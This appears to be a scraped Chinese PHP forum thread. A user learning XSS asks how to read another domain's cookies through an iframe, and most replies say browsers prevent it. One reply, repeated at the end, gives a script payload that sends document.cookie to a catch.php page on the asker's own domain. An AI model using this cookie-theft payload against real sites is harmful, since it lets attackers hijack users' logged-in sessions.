iframe跨站成功后,如何提取网站的Cookie? 最近在学着玩xss,默认情况下,iframe是禁止发送stored cookie的,那么真的没有办法在利用iframe实现跨站后提取cookie吗?望高手指点下迷津。 解决方案 » 免费领取超大流量手机卡,每月29元包185G流量+100分钟通话, 中国电信官方发货 你可以通过 curl 在自己的服务器上做代理 再说网站互通, 共用一个域名cookie, 估计谁都不愿意除非进入共产主义时代 我要的不是这样的效果,其实可以变通下,我在a.com下做了个页面,其中有一个iframe访问了b.com的页面,我需要在a.com的网页中取得b.com的cookie b.com的cookie存放在打开网页的人的浏览器里存放文件里, 你在a.com的服务器上怎么抓?还是你想表达的意思不是这样、? 没用过 curl.不过COOKIE 是由不同的域名组成. 也算是基于安全问题的缺陷,所以不带有跨域功能的. b.com/cookie.html:<script>document.location='http://a.com/catch.php?cookie='+document.cookie;</script>弄到你自己的域下,你想搞什么就随便了 别想了,那是异想天开,如果可以的话,那用户的信息就没保证了,一般网站会使用广告投放系统。如百度、google,还有一些合作。如果可以收集的话。你把用户的登录cookie获取了,再模拟这个cookie。那你就可以用这个用户登录了。浏览器是不会这样的做的,flash不知道可以不可以,但前提也必须在服务器端加配置文件 debian下安装eaccelerator出问题 ucenter_home的问题 Magento建站问题 zend studio设计窗口 apache 困惑? dzxccsu 請進入! PHP面试题,大家来试一试,娱乐一下 ^^ layer弹窗插件能不能直接在弹出窗口提交iframe页面表单 php5.2连接orcale11g求帮助,真的搞不定了,来大神救我。 使用phpstudy做301失败 php加水印问题 mysql里怎么获取一个时间段每一天的数据
我要的不是这样的效果,其实可以变通下,我在a.com下做了个页面,其中有一个iframe访问了b.com的页面,我需要在a.com的网页中取得b.com的cookie
b.com的cookie存放在打开网页的人的浏览器里存放文件里,
你在a.com的服务器上怎么抓?还是你想表达的意思不是这样、?
不过COOKIE 是由不同的域名组成. 也算是基于安全问题的缺陷,所以不带有跨域功能的.
b.com/cookie.html:<script>document.location='http://a.com/catch.php?cookie='+document.cookie;</script>
弄到你自己的域下,你想搞什么就随便了